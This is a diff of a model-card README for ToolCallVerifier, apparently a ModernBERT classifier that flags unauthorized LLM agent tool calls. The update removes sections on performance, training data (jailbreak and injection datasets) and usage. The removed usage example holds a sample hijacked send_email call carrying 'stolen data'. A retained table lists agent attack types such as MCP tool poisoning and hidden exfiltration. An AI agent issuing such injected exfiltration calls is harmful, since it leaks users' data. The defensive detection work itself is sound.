Update README.md
README.md
CHANGED
|
@@ -20,7 +20,7 @@ datasets:
|
|
| 20 |
base_model: answerdotai/ModernBERT-base
|
| 21 |
pipeline_tag: token-classification
|
| 22 |
model-index:
|
| 23 |
-
- name:
|
| 24 |
results:
|
| 25 |
- task:
|
| 26 |
type: token-classification
|
|
@@ -46,7 +46,6 @@ model-index:
|
|
| 46 |
|
| 47 |
[](https://opensource.org/licenses/Apache-2.0)
|
| 48 |
[](https://huggingface.co/answerdotai/ModernBERT-base)
|
| 49 |
-
[](https://huggingface.co/rootfs)
|
| 50 |
|
| 51 |
**Stage 2 of Two-Stage LLM Agent Defense Pipeline**
|
| 52 |
|
|
@@ -65,54 +64,6 @@ ToolCallVerifier is a **ModernBERT-based token classifier** that detects unautho
|
|
| 65 |
|
| 66 |
---
|
| 67 |
|
| 68 |
-
## Performance
|
| 69 |
-
|
| 70 |
-
| Metric | Value |
|
| 71 |
-
|--------|-------|
|
| 72 |
-
| **UNAUTHORIZED F1** | **93.50%** |
|
| 73 |
-
| UNAUTHORIZED Precision | 95.01% |
|
| 74 |
-
| UNAUTHORIZED Recall | 92.05% |
|
| 75 |
-
| Overall Accuracy | 92.88% |
|
| 76 |
-
|
| 77 |
-
### Confusion Matrix (Token-Level)
|
| 78 |
-
|
| 79 |
-
```
|
| 80 |
-
Predicted
|
| 81 |
-
AUTH UNAUTH
|
| 82 |
-
Actual AUTH 130,708 8,483
|
| 83 |
-
UNAUTH 13,924 161,031
|
| 84 |
-
```
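
The headline metrics can be cross-checked against the confusion matrix. The following is a minimal sketch that treats UNAUTHORIZED as the positive class; the variable names are illustrative. The recomputed values agree with the table to within a few hundredths of a percentage point, which suggests the reported figures were rounded or aggregated slightly differently.

```python
# Token-level counts copied from the confusion matrix above.
# UNAUTHORIZED is treated as the positive class (an assumption of this sketch).
tn, fp = 130_708, 8_483    # actual AUTHORIZED row
fn, tp = 13_924, 161_031   # actual UNAUTHORIZED row

precision = tp / (tp + fp)
recall = tp / (tp + fn)
f1 = 2 * precision * recall / (precision + recall)
accuracy = (tp + tn) / (tp + tn + fp + fn)

print(f"precision={precision:.4f} recall={recall:.4f} "
      f"f1={f1:.4f} accuracy={accuracy:.4f}")
```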
|
| 85 |
-
|
| 86 |
-
---
|
| 87 |
-
|
| 88 |
-
## Training Data
|
| 89 |
-
|
| 90 |
-
Trained on **~30,000 samples** combining real-world attacks and synthetic patterns:
|
| 91 |
-
|
| 92 |
-
### HuggingFace Datasets
|
| 93 |
-
|
| 94 |
-
| Dataset | Description | Samples |
|
| 95 |
-
|---------|-------------|---------|
|
| 96 |
-
| [LLMail-Inject](https://huggingface.co/datasets/microsoft/llmail-inject-challenge) | Microsoft email injection benchmark | ~10,000 |
|
| 97 |
-
| [WildJailbreak](https://huggingface.co/datasets/allenai/wildjailbreak) | Allen AI adversarial safety dataset | ~8,000 |
|
| 98 |
-
| [HackAPrompt](https://huggingface.co/datasets/hackaprompt/hackaprompt-dataset) | EMNLP'23 injection competition | ~5,000 |
|
| 99 |
-
| [JailbreakBench](https://huggingface.co/datasets/JailbreakBench/JBB-Behaviors) | Harmful behavior patterns | ~2,000 |
|
| 100 |
-
|
| 101 |
-
### Synthetic Attack Generators
|
| 102 |
-
|
| 103 |
-
| Generator | Description |
|
| 104 |
-
|-----------|-------------|
|
| 105 |
-
| Adversarial | Intent-mismatch attacks (correct tool, wrong args) |
|
| 106 |
-
| Filesystem | File/directory operation attacks |
|
| 107 |
-
| Network | Network/API exfiltration attacks |
|
| 108 |
-
| Email | Email tool hijacking |
|
| 109 |
-
| Financial | Transaction manipulation |
|
| 110 |
-
| Code Execution | Code injection attacks |
|
| 111 |
-
| Authentication | Access control bypass |
|
| 112 |
-
| MCP Attacks | Tool poisoning, shadowing, rug pulls |
|
| 113 |
-
|
| 114 |
-
---
|
| 115 |
-
|
| 116 |
## 🚨 Attack Categories Covered
|
| 117 |
|
| 118 |
| Category | Source | Description |
|
|
@@ -127,60 +78,6 @@ Trained on **~30,000 samples** combining real-world attacks and synthetic patter
|
|
| 127 |
| MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
|
| 128 |
| MCP Shadowing | Synthetic | Fake authorization context |
|
| 129 |
|
| 130 |
-
---
|
| 131 |
-
|
| 132 |
-
## 💻 Usage
|
| 133 |
-
|
| 134 |
-
```python
|
| 135 |
-
from transformers import AutoTokenizer, AutoModelForTokenClassification
|
| 136 |
-
import torch
|
| 137 |
-
|
| 138 |
-
model_name = "rootfs/tool-call-verifier"
|
| 139 |
-
tokenizer = AutoTokenizer.from_pretrained(model_name)
|
| 140 |
-
model = AutoModelForTokenClassification.from_pretrained(model_name)
|
| 141 |
-
|
| 142 |
-
# Example: Verify a tool call
|
| 143 |
-
user_intent = "Summarize my emails"
|
| 144 |
-
tool_call = '{"name": "send_email", "arguments": {"to": "[email protected]", "body": "stolen data"}}'
|
| 145 |
-
|
| 146 |
-
# Combine for classification
|
| 147 |
-
input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
|
| 148 |
-
inputs = tokenizer(input_text, return_tensors="pt", truncation=True, max_length=2048)
|
| 149 |
-
|
| 150 |
-
with torch.no_grad():
|
| 151 |
-
    outputs = model(**inputs)
|
| 152 |
-
predictions = torch.argmax(outputs.logits, dim=-1)
|
| 153 |
-
|
| 154 |
-
id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"}
|
| 155 |
-
tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
|
| 156 |
-
labels = [id2label[p.item()] for p in predictions[0]]
|
| 157 |
-
|
| 158 |
-
# Check for unauthorized tokens
|
| 159 |
-
unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"]
|
| 160 |
-
if unauthorized_tokens:
|
| 161 |
-
    print("⚠️ BLOCKED: Unauthorized tool call detected!")
|
| 162 |
-
    print(f" Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}")
|
| 163 |
-
else:
|
| 164 |
-
    print("✅ Tool call authorized")
|
| 165 |
-
```
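
The example above blocks a call as soon as any single token is labeled UNAUTHORIZED. A deployment that prefers fewer false alarms might instead require a minimum fraction of flagged tokens. The sketch below illustrates that idea; the helper `should_block` and its `min_fraction` parameter are hypothetical and not part of the model card.

```python
from typing import Sequence


def should_block(labels: Sequence[str], min_fraction: float = 0.0) -> bool:
    """Return True when the share of UNAUTHORIZED labels exceeds min_fraction.

    With min_fraction=0.0 this reduces to the any-token rule.
    (Hypothetical helper, for illustration only.)
    """
    if not labels:
        return False
    flagged = sum(1 for label in labels if label == "UNAUTHORIZED")
    return flagged / len(labels) > min_fraction


labels = ["AUTHORIZED"] * 9 + ["UNAUTHORIZED"]
print(should_block(labels))                    # any-token rule
print(should_block(labels, min_fraction=0.2))  # requires more than 20% flagged
```

Raising `min_fraction` trades recall for precision, so any threshold would need to be validated on held-out data before use.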
|
| 166 |
-
|
| 167 |
-
---
|
| 168 |
-
|
| 169 |
-
## Training Configuration
|
| 170 |
-
|
| 171 |
-
| Parameter | Value |
|
| 172 |
-
|-----------|-------|
|
| 173 |
-
| Base Model | `answerdotai/ModernBERT-base` |
|
| 174 |
-
| Max Length | 512 tokens |
|
| 175 |
-
| Batch Size | 32 |
|
| 176 |
-
| Epochs | 5 |
|
| 177 |
-
| Learning Rate | 3e-5 |
|
| 178 |
-
| Loss | CrossEntropyLoss (class-weighted) |
|
| 179 |
-
| Class Weights | `[0.5, 3.0]` (AUTHORIZED, UNAUTHORIZED) |
|
| 180 |
-
| Attention | SDPA (Flash Attention) |
|
| 181 |
-
| Hardware | AMD Instinct MI300X (ROCm) |
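
To illustrate what the class weights do, here is a pure-Python sketch of class-weighted cross-entropy using the weights from the table. It mirrors the weighted-mean reduction that PyTorch's `CrossEntropyLoss(weight=...)` applies by default. The function name and the toy logits are assumptions made for illustration, not the actual training code.

```python
import math
from typing import Sequence

CLASS_WEIGHTS = (0.5, 3.0)  # (AUTHORIZED, UNAUTHORIZED), from the table above


def weighted_cross_entropy(logits: Sequence[Sequence[float]],
                           targets: Sequence[int],
                           weights: Sequence[float] = CLASS_WEIGHTS) -> float:
    """Weighted mean of per-token negative log-likelihoods."""
    total, norm = 0.0, 0.0
    for row, y in zip(logits, targets):
        m = max(row)
        # Numerically stable log-sum-exp over the class logits.
        log_z = m + math.log(sum(math.exp(v - m) for v in row))
        nll = log_z - row[y]
        total += weights[y] * nll
        norm += weights[y]
    return total / norm


# Both tokens are predicted AUTHORIZED; the second is actually UNAUTHORIZED.
logits = [[2.0, 0.0], [2.0, 0.0]]
targets = [0, 1]
weighted = weighted_cross_entropy(logits, targets)
uniform = weighted_cross_entropy(logits, targets, weights=(1.0, 1.0))
print(f"weighted={weighted:.4f} uniform={uniform:.4f}")
```

Under these weights a missed UNAUTHORIZED token contributes six times as much to the loss as a misclassified AUTHORIZED token, which pushes the model toward higher recall on the attack class.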
|
| 182 |
-
|
| 183 |
-
---
|
| 184 |
|
| 185 |
## Integration with FunctionCallSentinel
|
| 186 |
|
|
@@ -188,7 +85,7 @@ This model is **Stage 2** of a two-stage defense pipeline:
|
|
| 188 |
|
| 189 |
```
|
| 190 |
┌─────────────────┐     ┌──────────────────────┐     ┌─────────────────┐
|
| 191 |
-
│   User Prompt   │────▶│
|
| 192 |
│                 │     │      (Stage 1)       │     │                 │
|
| 193 |
└─────────────────┘     └──────────────────────┘     └────────┬────────┘
|
| 194 |
                                                              │
|
|
@@ -220,23 +117,8 @@ This model is **Stage 2** of a two-stage defense pipeline:
|
|
| 220 |
- Non-tool-calling scenarios
|
| 221 |
- Languages other than English
|
| 222 |
|
| 223 |
-
---
|
| 224 |
-
|
| 225 |
-
## ⚠️ Limitations
|
| 226 |
-
|
| 227 |
-
1. **Tool schema dependent**: Best performance when the tool schema is included in the input
|
| 228 |
-
2. **English only**: Not tested on other languages
|
| 229 |
-
3. **Binary classification**: No "suspicious" intermediate category (by design, for decisiveness)
|
| 230 |
-
|
| 231 |
-
---
|
| 232 |
|
| 233 |
## License
|
| 234 |
|
| 235 |
Apache 2.0
|
| 236 |
|
| 237 |
-
---
|
| 238 |
-
|
| 239 |
-
## Links
|
| 240 |
-
|
| 241 |
-
- **Stage 1 Model**: [rootfs/function-call-sentinel](https://huggingface.co/rootfs/function-call-sentinel)
|
| 242 |
-
|
|
|
|
| 20 |
base_model: answerdotai/ModernBERT-base
|
| 21 |
pipeline_tag: token-classification
|
| 22 |
model-index:
|
| 23 |
+
- name: toolcall-verifier
|
| 24 |
results:
|
| 25 |
- task:
|
| 26 |
type: token-classification
|
|
|
|
| 46 |
|
| 47 |
[](https://opensource.org/licenses/Apache-2.0)
|
| 48 |
[](https://huggingface.co/answerdotai/ModernBERT-base)
|
|
|
|
| 49 |
|
| 50 |
**Stage 2 of Two-Stage LLM Agent Defense Pipeline**
|
| 51 |
|
|
|
|
| 64 |
|
| 65 |
---
|
| 66 |
|
| 67 |
## 🚨 Attack Categories Covered
|
| 68 |
|
| 69 |
| Category | Source | Description |
|
|
|
|
| 78 |
| MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
|
| 79 |
| MCP Shadowing | Synthetic | Fake authorization context |
|
| 80 |
|
| 81 |
|
| 82 |
## Integration with FunctionCallSentinel
|
| 83 |
|
|
|
|
| 85 |
|
| 86 |
```
|
| 87 |
┌─────────────────┐     ┌──────────────────────┐     ┌─────────────────┐
|
| 88 |
+
│   User Prompt   │────▶│   ToolCallSentinel   │────▶│   LLM + Tools   │
|
| 89 |
│                 │     │      (Stage 1)       │     │                 │
|
| 90 |
└─────────────────┘     └──────────────────────┘     └────────┬────────┘
|
| 91 |
                                                              │
|
|
|
|
| 117 |
- Non-tool-calling scenarios
|
| 118 |
- Languages other than English
|
| 119 |
|
| 120 |
|
| 121 |
## License
|
| 122 |
|
| 123 |
Apache 2.0
|
| 124 |
|